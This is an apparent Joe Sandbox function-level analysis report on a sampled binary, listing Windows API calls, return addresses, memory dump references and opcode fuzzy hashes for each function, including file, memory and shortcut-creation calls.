                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID: AttributesFile
                                              • String ID:
                                              • API String ID: 3188754299-0
                                              • Opcode ID: 5adc5d60a7dd4af011d60b8927d5fbfdd00464e259639d1fcd3b0c23b8927a9d
                                              • Instruction ID: 5817d5120c2da98d16edaa91ace5ca285f5b3ff1e58b2ffd557e42fef7bfdc6e
                                              • Opcode Fuzzy Hash: 5adc5d60a7dd4af011d60b8927d5fbfdd00464e259639d1fcd3b0c23b8927a9d
                                              • Instruction Fuzzy Hash: 66F05E72100201DBC720AF98C840BA777F5BB84314F04483EE583F2AA0D778B885CB59
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID:
                                              • API String ID: 3519838083-0
                                              • Opcode ID: 05aa82fd4493c2954843b58147a6e12e638aaadf2772ca9641b0bace8f10624d
                                              • Instruction ID: 375caa893e42e0daca7b158ffe4b4b415bc54d3572d418f3e5e61c8e5be1c541
                                              • Opcode Fuzzy Hash: 05aa82fd4493c2954843b58147a6e12e638aaadf2772ca9641b0bace8f10624d
                                              • Instruction Fuzzy Hash: 30F0F272500109BBCF029F85D901AEEBB36EB48354F00811ABA1161160D33A9961AB99
                                              APIs
                                                • Part of subcall function 0040D985: CloseHandle.KERNELBASE(00000001,000000FF,0040DA61,00413330,?,0040DB39,L@,40000000,00000000,00000000,00000000,0040DB50,00000000,00000001,00000001,00000080), ref: 0040D990
                                              • CreateFileW.KERNELBASE(?,?,?,00000000,?,?,00000000,00413330,?,0040DB39,L@,40000000,00000000,00000000,00000000,0040DB50), ref: 0040DA78
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID: CloseCreateFileHandle
                                              • String ID:
                                              • API String ID: 3498533004-0
                                              • Opcode ID: 08bceb1980caaee1328d4f84b7def86f7a2986f91a3075995b51455990be9560
                                              • Instruction ID: 040011ad7fb3de3f437c6c7e3ebc1dcda5640d8293b7e84d035d3e38099293ab
                                              • Opcode Fuzzy Hash: 08bceb1980caaee1328d4f84b7def86f7a2986f91a3075995b51455990be9560
                                              • Instruction Fuzzy Hash: A1E04F32140219ABCF215FA49C01BCA7B96AF09760F144526BE11A61E0C672D465AF94
                                              APIs
                                              • WriteFile.KERNELBASE(?,?,00000001,00000000,00000000,?,?,0040DD78,00000001,00000000,00000000,00413330,?,00404D94,?,?), ref: 0040DBBA
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID: FileWrite
                                              • String ID:
                                              • API String ID: 3934441357-0
                                              • Opcode ID: 3077b537328fed6cd21bdd98b87c61334e39a2b5a14a0e6e22fef2783c677b0b
                                              • Instruction ID: ec3d056ad33d5175d1bee219b94afd5900c8108b90431a53c6143dcb1d381838
                                              • Opcode Fuzzy Hash: 3077b537328fed6cd21bdd98b87c61334e39a2b5a14a0e6e22fef2783c677b0b
                                              • Instruction Fuzzy Hash: D7E0C275600208FBCB00CF95C801B9E7BBABB49755F10C069F918AA2A0D739AA10DF54
                                              APIs
                                              • _beginthreadex.MSVCRT ref: 00406552
                                                • Part of subcall function 00406501: GetLastError.KERNEL32(00406563,00000000), ref: 004064F5
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID: ErrorLast_beginthreadex
                                              • String ID:
                                              • API String ID: 4034172046-0
                                              • Opcode ID: e5ca857e6cae9760b500a95e192be9ea992c298de85bf840c792a1269a380ec9
                                              • Instruction ID: fe95790bd269afcad05a26a3721163fc0b830ac61c9b3c5b6bbddf8a66cf2d64
                                              • Opcode Fuzzy Hash: e5ca857e6cae9760b500a95e192be9ea992c298de85bf840c792a1269a380ec9
                                              • Instruction Fuzzy Hash: 12D05EF6400208BFDF01DFE0DC05CAB3BADEB08204B004464FD05C2150E632DA108B60
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID:
                                              • API String ID: 3519838083-0
                                              • Opcode ID: e8864bf39b3a1c941500cd6d38dedcba990c3b7db4eb5411aa9ab2a8414fad35
                                              • Instruction ID: 312fbe8762c42e8d4a239ae194adb86e93363bc1e5443e54fb58aca6058f63a2
                                              • Opcode Fuzzy Hash: e8864bf39b3a1c941500cd6d38dedcba990c3b7db4eb5411aa9ab2a8414fad35
                                              • Instruction Fuzzy Hash: 70D05EB2A04108FBE7109F85D946BEEFB78EB80399F10823FB506B1150D7BC5A0196AD
                                              APIs
                                              • ReadFile.KERNELBASE(?,?,?,00000000,00000000), ref: 0040DAF2
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID: FileRead
                                              • String ID:
                                              • API String ID: 2738559852-0
                                              • Opcode ID: 05e1a1911e5ec75f7d6758f34865a5827037a9c860dec67033daab0b9cfe5943
                                              • Instruction ID: c05821c64f4412cbb188b0f884d423eaa3d686fb1c941f6ac6705c8b1bb703da
                                              • Opcode Fuzzy Hash: 05e1a1911e5ec75f7d6758f34865a5827037a9c860dec67033daab0b9cfe5943
                                              • Instruction Fuzzy Hash: 58E0EC75211208FFDB01CF90CD01FDE7BBDFB49755F208058E90596160C7759A10EB54
                                              APIs
                                              • SetFileTime.KERNELBASE(?,?,?,?,0040DB94,00000000,00000000,?,0040123C,?), ref: 0040DB78
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID: FileTime
                                              • String ID:
                                              • API String ID: 1425588814-0
                                              • Opcode ID: d3a1cd3220883f1d47adb6259c26a1719b9664e7d8bae69288c7dd66fbb4bdaa
                                              • Instruction ID: c6000770aa4fb4c72b4925fc402daec6625791e8065b7518697746b49206ca3e
                                              • Opcode Fuzzy Hash: d3a1cd3220883f1d47adb6259c26a1719b9664e7d8bae69288c7dd66fbb4bdaa
                                              • Instruction Fuzzy Hash: 40C04C3A199105FF8F020F70CD04C1ABBA2AB95722F10C918B199C4070CB328424EB02
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID: memmove
                                              • String ID:
                                              • API String ID: 2162964266-0
                                              • Opcode ID: 97bd8de7a7fe9ad43a3345e9333d2138b4beb196f0434672ce39f7d09e0e15cd
                                              • Instruction ID: f56dbf57367ec124b55c1fed62106b1dafce564086f6503587e0b0fbfa293862
                                              • Opcode Fuzzy Hash: 97bd8de7a7fe9ad43a3345e9333d2138b4beb196f0434672ce39f7d09e0e15cd
                                              • Instruction Fuzzy Hash: EA21A271A00B009FC724CFAAC88485BF7F9FF88724764896EE49A93A40E774B945CB54
                                              APIs
                                              • _CxxThrowException.MSVCRT(?,00414F84), ref: 0040E616
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID: ExceptionThrow
                                              • String ID:
                                              • API String ID: 432778473-0
                                              • Opcode ID: 85c4e5dde0f8cee934fbe77132b2d5831568e55a053817787dcfc8e06ea2b7f6
                                              • Instruction ID: f2b552c6dcb6979234feea5fe890f572eb9d388e9264680fa6f26452196acfb0
                                              • Opcode Fuzzy Hash: 85c4e5dde0f8cee934fbe77132b2d5831568e55a053817787dcfc8e06ea2b7f6
                                              • Instruction Fuzzy Hash: 20017171600701AFDB28CFBAD805997BBF8EF85314704496EE482D3651E374F946CB50
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID: free
                                              • String ID:
                                              • API String ID: 1294909896-0
                                              • Opcode ID: ad693850b0beb581ae9f70f91648a78de6b85f526a16152dd36665cc48ec9015
                                              • Instruction ID: 8ccd5c106adaedd21fdabd868c2a091acccb285e2c6396e7c66228af9079aab7
                                              • Opcode Fuzzy Hash: ad693850b0beb581ae9f70f91648a78de6b85f526a16152dd36665cc48ec9015
                                              • Instruction Fuzzy Hash: 68E0ED311087008BEB74DA38A941F97B3DAAB14314F15893FE89AE7690EB74FC448A59
                                              APIs
                                              • ??2@YAPAXI@Z.MSVCRT(00000018,00000000,004044E9,?,?,?,?,?,?,?,?,?,?,00000000,00000020,?), ref: 00402F71
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID: ??2@
                                              • String ID:
                                              • API String ID: 1033339047-0
                                              • Opcode ID: 76c2607c9262a084594b8968e60506e1095ba5b3921c342d3f15f01c827a8030
                                              • Instruction ID: 194059228ff5733793a196764ebf5a0b63d959e09992ce12dff2d54d27d13516
                                              • Opcode Fuzzy Hash: 76c2607c9262a084594b8968e60506e1095ba5b3921c342d3f15f01c827a8030
                                              • Instruction Fuzzy Hash: 67D0A9313083121ADA5432320A09AAF84848B503A0F10083FB800A32D1DCBE8C81A299
                                              APIs
                                              • CloseHandle.KERNELBASE(00000001,000000FF,0040DA61,00413330,?,0040DB39,L@,40000000,00000000,00000000,00000000,0040DB50,00000000,00000001,00000001,00000080), ref: 0040D990
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID: CloseHandle
                                              • String ID:
                                              • API String ID: 2962429428-0
                                              • Opcode ID: 5a1e794e604a6db35733be3680912b24c50de2529967425d082228c541f5af6f
                                              • Instruction ID: 71cfb53d0268b44c797f7400575dcc0518408263689e7c465582b3111ebcfb94
                                              • Opcode Fuzzy Hash: 5a1e794e604a6db35733be3680912b24c50de2529967425d082228c541f5af6f
                                              • Instruction Fuzzy Hash: 95D0127251422156CF646E7CB8849C277D85A06334335176AF0B4E32E4D3749DCB5698
                                              APIs
                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,0040E4D6,00020000,00000000,?,00000000,?,0040D92B,?,?,00000000,?,0040D96E), ref: 004024E0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: 076169c5b403ddfe74b0b9752022086d8412a0b80d08fe31e2627fee67d73aef
                                              • Instruction ID: 23ad038ad5ccaf642d49e1102795c1c714580f299e31bec6e074b0e2bc220d86
                                              • Opcode Fuzzy Hash: 076169c5b403ddfe74b0b9752022086d8412a0b80d08fe31e2627fee67d73aef
                                              • Instruction Fuzzy Hash: D3C080301443007DED115F505E06B463A916B44717F508065F344540D0C7F484009509
                                              APIs
                                              • ??2@YAPAXI@Z.MSVCRT(000000D0), ref: 0041138D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID: ??2@
                                              • String ID:
                                              • API String ID: 1033339047-0
                                              • Opcode ID: 08d588780a3caab37cf70573278ad1822b03e6a84bf609910ea5ba04e31b1b9c
                                              • Instruction ID: d5b8b2b556814232dc2945b8f7e5995fed121ff751d048b21687cc00dda573f5
                                              • Opcode Fuzzy Hash: 08d588780a3caab37cf70573278ad1822b03e6a84bf609910ea5ba04e31b1b9c
                                              • Instruction Fuzzy Hash: B4B0123438914504FE5413B208013FB01800F40303F10087B5B02E4DF9FD0884805139
                                              APIs
                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,0040E561,?,00000004,0040E5B0,?,?,004117E5,?), ref: 00401B2A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID: FreeVirtual
                                              • String ID:
                                              • API String ID: 1263568516-0
                                              • Opcode ID: 727c456c664ec040fae2a494910ef8e866b16c48e489126d85a402f0e100615f
                                              • Instruction ID: 5381ed20748db0b7fd93371e38984c83fa4171db9cf80dc6a42123bab5888d64
                                              • Opcode Fuzzy Hash: 727c456c664ec040fae2a494910ef8e866b16c48e489126d85a402f0e100615f
                                              • Instruction Fuzzy Hash: 45A002305446007ADE515B10DD05F457F516744B11F20C5547155540E586755654DA09
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID: free
                                              • String ID:
                                              • API String ID: 1294909896-0
                                              • Opcode ID: d9246d09a93a321ccd45a7f77b4b3a05b9734a8e70a1dc2b954ba7e43b8076d7
                                              • Instruction ID: 7baee4be7330d58fba6a4d3e6254b3dabd4481adb37f3967e502ba2394f26960
                                              • Opcode Fuzzy Hash: d9246d09a93a321ccd45a7f77b4b3a05b9734a8e70a1dc2b954ba7e43b8076d7
                                              • Instruction Fuzzy Hash:
                                              APIs
                                              • _wtol.MSVCRT ref: 004034E5
                                              • SHGetSpecialFolderPathW.SHELL32(00000000,?,CC5BE863,00000000,004177A0,00000000,00417794), ref: 00403588
                                              • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 004035F9
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?), ref: 00403601
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 00403609
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?), ref: 00403611
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?), ref: 00403619
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 00403621
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 00403629
                                              • _wtol.MSVCRT ref: 0040367F
                                              • CoCreateInstance.OLE32(00414BF4,00000000,00000001,00414BE4,00404F9B,.lnk,?,0000005C), ref: 00403720
                                              • ??3@YAXPAX@Z.MSVCRT(?,0000005C), ref: 004037B8
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,0000005C), ref: 004037C0
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,0000005C), ref: 004037C8
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0000005C), ref: 004037D0
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,0000005C), ref: 004037D8
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,0000005C), ref: 004037E0
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,0000005C), ref: 004037E8
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,0000005C), ref: 004037EE
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,0000005C), ref: 004037F6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID: ??3@$_wtol$CreateFolderInstancePathSpecial
                                              • String ID: .lnk
                                              • API String ID: 408529070-24824748
                                              • Opcode ID: cb1a116a375c0276f3cc47ebae34f017b071fc5c88c5a353f484599fe5934efa
                                              • Instruction ID: c4a1d47ac56633071a1bd2db01059e5edb54ffe0bccc65637149caefe5d2277b
                                              • Opcode Fuzzy Hash: cb1a116a375c0276f3cc47ebae34f017b071fc5c88c5a353f484599fe5934efa
